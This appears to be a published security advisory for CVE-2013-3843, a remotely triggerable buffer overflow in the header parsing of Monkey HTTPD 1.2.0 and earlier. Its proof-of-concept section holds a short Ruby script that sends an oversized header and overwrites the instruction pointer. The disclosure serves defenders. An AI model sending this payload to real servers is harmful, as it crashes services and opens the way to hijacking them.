Monkey 1.2.0 Buffer Overflow

`1. Title  
  
CVE-2013-3843 Monkey HTTPD 1.2.0 - Buffer Overflow DoS  
Vulnerability With Possible Arbitrary Code Execution  
  
2. Introduction  
  
Monkey is a lightweight and powerful web server for  
GNU/Linux.  
  
It has been designed to be very scalable with low memory  
and CPU consumption, the perfect solution for embedded  
devices. Made for ARM, x86 and x64.  
  
  
3. Abstract  
  
A specially crafted request sent to the Monkey HTTPD  
server triggers a buffer overflow which can be used to  
control the flow of execution.  
  
4. Report Timeline  
  
2013-05-29  
Discovered vulnerability via fuzzing  
2013-05-30  
Vendor Notification  
  
5. Status  
  
Published  
  
6. Affected Products  
  
Monkey HTTPD <= 1.2.0  
  
7. Exploitation Technique  
  
Remote  
  
8. Details  
  
Improper bounds checking while parsing headers allows  
for an attacker to craft a request that will trigger a  
buffer overflow during a call to memcpy() on line 268  
in the file, mk_request.c.  
  
9. Proof of Concept  
  
The vulnerability can be exploited by remote attacker  
without any special privileges. Under Ubuntu 13.04,  
an offset of 2511 lines up the instruction pointer  
with, 0x42424242.  
  
  
#!/usr/bin/env ruby  
  
require "socket"  
  
host = "localhost"  
port = 2001  
  
s = TCPSocket.open(host, port)  
  
buf = "GET / HTTP/1.1\r\n"  
buf << "Host: " + "\r\n"  
buf << "localhost\r\n"  
buf << "Bad: "  
buf << "A" * 2511  
buf << "B" * 4  
  
s.puts(buf)  
  
  
10. Solution  
  
There is currently no solution.  
  
11. Risk  
  
Risk should be considered high since it can be shown that  
the flow of execution can be controlled by an attacker.  
  
12. References  
  
http://bugs.monkey-project.com/ticket/182  
  
13. Credits  
  
Doug Prostko <dougtko[at]gmail[dot]com>  
Vulnerability discovery  
`